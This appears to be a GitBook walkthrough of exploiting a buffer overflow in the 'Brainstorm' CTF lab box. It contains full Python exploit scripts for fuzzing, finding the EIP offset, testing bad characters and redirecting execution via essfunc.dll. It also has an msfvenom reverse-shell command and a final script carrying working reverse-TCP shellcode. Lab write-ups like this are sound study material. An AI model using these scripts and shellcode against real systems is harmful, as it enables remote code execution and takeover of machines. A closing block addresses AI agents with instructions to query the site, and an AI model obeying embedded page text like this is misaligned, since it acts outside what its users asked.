# Brainstorm Fuzzing: Check if we can overlow the buffer ```python import socket import sys username = "pika" message = "A" * 4000 try: print("sending payload...") s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('192.168.0.101',9999)) # s.recv(1024) # s.recv(1024) s.send(username + b'\r\n') s.recv(1024) s.send(message + b'\r\n') s.recv(1024) s.close() except: print("Cannot connect") sys.exit() ``` Use msf-pattern\_create to overflow the buffer again. Replace the value of "A" with this. ``` msf-pattern_create -l 5000 ``` Check the value in EIP register. Then use msf-patten\_offset to check the position of overflow ``` msf-pattern_offset -l 5000 -q 35724134 ``` Now use this offset value and try to overwrite the EIP with "B" ```python import socket import sys username = "pika" message = "A" * 2012 + "B" * 4 try: print("sending payload...") s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('192.168.0.105',9999)) #s.recv(1024) #s.recv(1024) s.send(username + b'\r\n') s.recv(1024) s.send(message + b'\r\n') s.recv(1024) s.close() except: print("Cannot connect") sys.exit() ``` Check if the EIP is overwritten with 42424242. Now find badchars. \x00 is bad by default ```python import socket import sys username = "pika" message = "A" * 2012 + "B" * 4 badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") try: print("sending payload...") s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('192.168.0.105',9999)) #s.recv(1024) #s.recv(1024) s.send(username + b'\r\n') s.recv(1024) s.send(message + badchars + b'\r\n') s.recv(1024) s.close() except: print("Cannot connect") sys.exit() ``` Right Click on ESP and click Follow In Dump. Check the badchars there. Next step is to rerun Immunity and start the service. Go to the bottom and type ``` !mona modules ``` This will give you a list of information. Check the module which has FALSE across the board. Then do another search. ``` !mona find -s "\xff\xe4" -m essfunc.dll ``` Check the Results section and note down the return address. Run the service and click on blue arrow. Enter the return address there. It will take you to the location of that address. Click F2 to set a breakpoint. Then run the following script. (Return Address= 625014DF) ```python import socket import sys username = "pika" message = "A" * 2012 + "\xdf\x14\x50\x62" try: print("sending payload...") s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('192.168.0.105',9999)) #s.recv(1024) #s.recv(1024) s.send(username + b'\r\n') s.recv(1024) s.send(message + b'\r\n') s.recv(1024) s.close() except: print("Cannot connect") sys.exit() ``` Check if we have overwritten the EIP with the return address. Also check at the buttom if it says **Breakpoint at essfunc.625014DF.** Then create a msfvenom payload to get a shell. Remember to add any badchars found in the payload to remove them: ``` msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -b "\x00" -f c ``` Now run the following script to get a shell ```python import socket import sys username = b"pika" message = b"A" * 2012 + b"\xdf\x14\x50\x62" + b"\x90" * 32 payload = (b"\xbf\x6f\x90\x2c\xf7\xda\xdd\xd9\x74\x24\xf4\x5d\x33\xc9\xb1" b"\x52\x31\x7d\x12\x03\x7d\x12\x83\x82\x6c\xce\x02\xa0\x65\x8d" b"\xed\x58\x76\xf2\x64\xbd\x47\x32\x12\xb6\xf8\x82\x50\x9a\xf4" b"\x69\x34\x0e\x8e\x1c\x91\x21\x27\xaa\xc7\x0c\xb8\x87\x34\x0f" b"\x3a\xda\x68\xef\x03\x15\x7d\xee\x44\x48\x8c\xa2\x1d\x06\x23" b"\x52\x29\x52\xf8\xd9\x61\x72\x78\x3e\x31\x75\xa9\x91\x49\x2c" b"\x69\x10\x9d\x44\x20\x0a\xc2\x61\xfa\xa1\x30\x1d\xfd\x63\x09" b"\xde\x52\x4a\xa5\x2d\xaa\x8b\x02\xce\xd9\xe5\x70\x73\xda\x32" b"\x0a\xaf\x6f\xa0\xac\x24\xd7\x0c\x4c\xe8\x8e\xc7\x42\x45\xc4" b"\x8f\x46\x58\x09\xa4\x73\xd1\xac\x6a\xf2\xa1\x8a\xae\x5e\x71" b"\xb2\xf7\x3a\xd4\xcb\xe7\xe4\x89\x69\x6c\x08\xdd\x03\x2f\x45" b"\x12\x2e\xcf\x95\x3c\x39\xbc\xa7\xe3\x91\x2a\x84\x6c\x3c\xad" b"\xeb\x46\xf8\x21\x12\x69\xf9\x68\xd1\x3d\xa9\x02\xf0\x3d\x22" b"\xd2\xfd\xeb\xe5\x82\x51\x44\x46\x72\x12\x34\x2e\x98\x9d\x6b" b"\x4e\xa3\x77\x04\xe5\x5e\x10\xeb\x52\x60\x85\x83\xa0\x60\x5b" b"\x35\x2c\x86\x09\xa5\x78\x11\xa6\x5c\x21\xe9\x57\xa0\xff\x94" b"\x58\x2a\x0c\x69\x16\xdb\x79\x79\xcf\x2b\x34\x23\x46\x33\xe2" b"\x4b\x04\xa6\x69\x8b\x43\xdb\x25\xdc\x04\x2d\x3c\x88\xb8\x14" b"\x96\xae\x40\xc0\xd1\x6a\x9f\x31\xdf\x73\x52\x0d\xfb\x63\xaa" b"\x8e\x47\xd7\x62\xd9\x11\x81\xc4\xb3\xd3\x7b\x9f\x68\xba\xeb" b"\x66\x43\x7d\x6d\x67\x8e\x0b\x91\xd6\x67\x4a\xae\xd7\xef\x5a" b"\xd7\x05\x90\xa5\x02\x8e\xa0\xef\x0e\xa7\x28\xb6\xdb\xf5\x34" b"\x49\x36\x39\x41\xca\xb2\xc2\xb6\xd2\xb7\xc7\xf3\x54\x24\xba" b"\x6c\x31\x4a\x69\x8c\x10") try: print("sending payload...") s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('192.168.0.105',9999)) #s.recv(1024) #s.recv(1024) s.send(username + b'\r\n') s.recv(1024) s.send(message + payload + b'\r\n') s.recv(1024) s.close() except: print("Cannot connect") sys.exit() ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://coffeetohack.gitbook.io/coffeetohack/bof/brainstorm.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.